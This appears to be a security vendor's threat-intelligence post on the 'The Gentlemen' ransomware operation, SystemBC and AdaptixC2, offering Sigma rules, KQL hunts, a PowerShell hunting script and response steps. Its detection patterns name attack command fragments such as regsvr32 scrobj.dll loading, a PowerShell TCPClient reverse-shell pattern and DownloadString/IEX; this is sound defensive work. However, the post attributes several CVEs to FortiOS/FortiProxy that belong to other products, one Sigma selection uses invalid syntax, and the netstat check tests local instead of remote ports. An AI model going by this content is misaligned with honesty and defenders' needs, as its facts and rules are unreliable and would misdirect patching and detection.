Back to Intelligence

The Gentlemen RaaS & AdaptixC2 Framework: OTX Pulse Analysis — Enterprise Detection Pack

SA
Security Arsenal Team
April 20, 2026
7 min read

Threat Summary

Recent OTX pulse data reveals a sophisticated ransomware-as-a-service (RaaS) operation by threat actor "The Gentlemen" that has rapidly expanded since mid-2025, claiming over 320 victims with 240 attacks occurring in early 2026 alone. The Gentlemen exploit critical vulnerabilities in FortiOS/FortiProxy (CVE-2023-27532, CVE-2024-37085, CVE-2024-55591, CVE-2025-32463) for initial access, then deploy SystemBC proxy malware for covert tunneling alongside Cobalt Strike beacons. Of particular concern is the group's adoption of AdaptixC2, an emerging open-source post-exploitation framework that supports Windows, macOS, and Linux with extensive modularity through Beacon Object Files (BOFs).

The attack chain typically begins with exploiting public-facing applications, particularly Fortinet infrastructure, followed by deployment of SystemBC for establishing encrypted tunnels to C2 infrastructure. The Gentlemen then use Cobalt Strike, Mimikatz, AnyDesk, and PsExec for lateral movement and privilege escalation, ultimately deploying multiple ransomware variants (Babuk, Babyk, Vasa Locker, Qilin, LockBit 5.0, Medusa) that target Windows, Linux, NAS, BSD, and ESXi platforms.

Threat Actor / Malware Profile

The Gentlemen

  • Distribution Method: Primarily exploits FortiOS/FortiProxy vulnerabilities (CVE-2023-27532, CVE-2024-37085, CVE-2024-55591, CVE-2025-32463)
  • Attack Vector: Public-facing application exploitation, particularly targeting Fortinet infrastructure
  • Persistence Mechanism: SystemBC for tunneling, Cobalt Strike beacons, scheduled tasks
  • C2 Communication: Uses SystemBC for covert proxy tunneling to C2 infrastructure with RC4 encryption
  • Anti-Analysis Techniques: Advanced defense evasion, uses multiple malware families to diversify detection profile
  • Ransomware Variants: Babuk, Babyk, Vasa Locker, Qilin, LockBit 5.0, Medusa

SystemBC

  • Payload Behavior: Lightweight proxy malware used for establishing encrypted tunnels
  • C2 Communication: RC4-encrypted communications through covert channels
  • Persistence: Often deployed as a scheduled task or service to maintain access
  • Capabilities: Traffic redirection, tunneling, data exfiltration

AdaptixC2

  • Distribution Method: Deployed during post-exploitation phase by multiple threat actors
  • Platform Support: Windows, macOS, Linux (written in Go and C++)
  • C2 Communication: HTTP/S, TCP, mTLS, DNS, DoH, and SMB with RC4 encryption
  • Modularity: Beacon Object Files (BOFs) for extensive functionality
  • Associated Malware: MgBot, CoolClient, ToneShell, VBShower, VBCloud, PowerShower, CloudAtlas

Cobalt Strike

  • Payload Behavior: Commercial penetration testing tool abused for C2 and lateral movement
  • C2 Communication: Customizable communication channels (HTTP, DNS, SMB, etc.)
  • Capabilities: Process injection, privilege escalation, lateral movement
  • Common Artifacts: PowerShell beacons, reflective DLL injection

IOC Analysis

The OTX pulses provide a mix of indicator types that SOC teams should operationalize immediately:

  • File Hashes (MD5, SHA1, SHA256): Multiple file hashes for SystemBC, AdaptixC2, and The Gentlemen ransomware samples
  • CVE Identifiers: Key vulnerabilities exploited by The Gentlemen for initial access
  • No IP/Domain Indicators: The pulses don't include direct IP or domain indicators, suggesting focus on malware samples rather than C2 infrastructure

SOC teams should:

  1. Import all file hashes into EDR systems for immediate scanning
  2. Ensure vulnerability management platforms have flagged the listed CVEs
  3. Use threat hunting to search for SystemBC and AdaptixC2 behavioral indicators
  4. Implement memory scanning for Cobalt Strike beacons and BOFs

The absence of explicit C2 infrastructure indicators in these pulses suggests that SOC teams should focus on behavioral detection rather than just blocklisting domains/IPs.

Detection Engineering

YAML
---
title: Potential SystemBC Proxy Installation
id: 6a4b3c2d-1e5f-4a8b-9c6d-7e8f0a1b2c3d
description: Detects potential installation of SystemBC proxy malware, which is frequently used by The Gentlemen ransomware gang for covert tunneling
author: Security Arsenal
date: 2026/04/20
references:
    - https://otx.alienvault.com/pulse/662291653e07e0b3143d9d6c/
tags:
    - attack.command_and_control
    - attack.t1071
status: experimental
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\cmd.exe' or ParentImage|endswith: '\powershell.exe'
        CommandLine|contains|all:
            - 'regsvr32.exe'
            - '/s'
            - '/i'
        CommandLine|contains:
            - 'http://'
            - 'scrobj.dll'
    condition: selection
falsepositives:
    - Legitimate administrative tasks
level: high
---
title: Suspicious AdaptixC2 Framework Activity
id: 5d4c3b2a-0f4e-3d7a-8b5c-6d7e0a1b2c3d
description: Detects potential AdaptixC2 framework activity, a post-exploitation tool increasingly used by APT groups and ransomware operators
author: Security Arsenal
date: 2026/04/20
references:
    - https://otx.alienvault.com/pulse/6622f6653e07e0b3143d9d6c/
tags:
    - attack.execution
    - attack.t1059
status: experimental
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains|all:
            - 'New-Object'
            - 'System.Net.Sockets.TCPClient'
            - 'GetStream'
            - 'Read'
    condition: selection
falsepositives:
    - Legitimate PowerShell network operations
level: medium
---
title: The Gentlemen Ransomware Activity Pattern
id: 4e3d2c1b-9f3d-2c6a-7b4a-5c6d0e1f2a3b
description: Detects activity patterns associated with The Gentlemen ransomware gang, including their use of SystemBC, Cobalt Strike, and AnyDesk
author: Security Arsenal
date: 2026/04/20
references:
    - https://otx.alienvault.com/pulse/662291653e07e0b3143d9d6c/
    - https://otx.alienvault.com/pulse/6622917f3e07e0b3143d9d6c/
tags:
    - attack.impact
    - attack.t1486
status: experimental
logsource:
    category: process_creation
    product: windows
detection:
    selection_anydesk:
        Image|endswith: '\anydesk.exe'
        CommandLine|contains: 'start'
    selection_psexec:
        Image|endswith: '\psexec.exe'
        CommandLine|contains: '-accepteula'
    selection_cobaltstrike:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'DownloadString'
            - 'IEX'
    condition: 1 of selection_*
falsepositives:
    - Authorized remote administration tools
level: high


kql
// Hunt for SystemBC network connections
DeviceNetworkEvents
| where RemotePort in (443, 8080, 8888, 53)
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "regsvr32.exe")
| where NetworkConnectionStatus == "Established"
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort
| order by Timestamp desc

// Search for AdaptixC2 related processes
DeviceProcessEvents
| where ProcessCommandLine has "New-Object" and ProcessCommandLine has "System.Net.Sockets.TCPClient"
| where ProcessCommandLine has "GetStream" or ProcessCommandLine has "Read"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc

// Hunt for The Gentlemen related tool usage
DeviceProcessEvents
| where FileName in~ ("anydesk.exe", "psexec.exe") 
| where ProcessCommandLine has "-accepteula" or ProcessCommandLine has "start"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc


powershell
# The Gentlemen IOC Hunt Script
# Check for SystemBC artifacts
$systembcPaths = @(
    "$env:TEMP\scrobj.dll",
    "$env:APPDATA\SystemBC",
    "$env:LOCALAPPDATA\SystemBC"
)

foreach ($path in $systembcPaths) {
    if (Test-Path $path) {
        Write-Host "ALERT: Potential SystemBC artifact found at $path"
        $fileHash = Get-FileHash -Path $path -Algorithm SHA256
        Write-Host "File Hash: $($fileHash.Hash)"
    }
}

# Check for SystemBC scheduled tasks
$scheduledTasks = Get-ScheduledTask | Where-Object { $_.Actions.Execute -like "*SystemBC*" -or $_.Actions.WorkingDirectory -like "*SystemBC*" }
if ($scheduledTasks) {
    Write-Host "ALERT: Potential SystemBC scheduled tasks found:"
    $scheduledTasks | ForEach-Object { 
        Write-Host "Task Name: $($_.TaskName)"
        Write-Host "Task Path: $($_.TaskPath)"
    }
}

# Check for AdaptixC2 indicators
$adaptixRegistryPaths = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdaptixC2",
    "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdaptixC2"
)

foreach ($regPath in $adaptixRegistryPaths) {
    if (Test-Path $regPath) {
        Write-Host "ALERT: Potential AdaptixC2 persistence mechanism found at $regPath"
        Get-ItemProperty -Path $regPath
    }
}

# Check for unusual network connections (SystemBC typically uses specific ports)
$netstatOutput = netstat -ano | Select-String "ESTABLISHED"
$systembcPorts = @(443, 8080, 8888, 53, 80)
$suspiciousConnections = $netstatOutput | Where-Object { 
    $line = $_.ToString().Split(' ', [StringSplitOptions]::RemoveEmptyEntries)
    $localAddress = $line[1]
    $localPort = $localAddress.Split(':')[-1]
    $systembcPorts -contains [int]$localPort
}

if ($suspiciousConnections) {
    Write-Host "ALERT: Potential SystemBC network connections detected:"
    $suspiciousConnections
}

Response Priorities

Immediate Actions:

  1. Block all file hashes listed in the IOCs across endpoints and network
  2. Apply patches for CVE-2023-27532, CVE-2024-37085, CVE-2024-55591, and CVE-2025-32463 immediately
  3. Hunt for SystemBC artifacts and persistence mechanisms on critical systems
  4. Check Fortinet devices for indicators of compromise

24 Hours:

  1. Conduct comprehensive scan for AdaptixC2 framework indicators
  2. Review firewall and proxy logs for suspicious connections related to C2 infrastructure
  3. Validate any unauthorized remote access tools (AnyDesk, PsExec) in the environment
  4. Isolate systems with potential Cobalt Strike beacons

1 Week:

  1. Review and harden Fortinet configurations, especially public-facing services
  2. Implement behavioral detection for SystemBC and AdaptixC2 activity patterns
  3. Update incident response playbooks to address The Gentlemen TTPs
  4. Conduct threat hunting exercises focusing on ransomware precursors
  5. Review and restrict the use of remote administration tools to authorized systems only

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-aptthe-gentlemenadaptixc2ransomwaresystembccobalt-strike

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action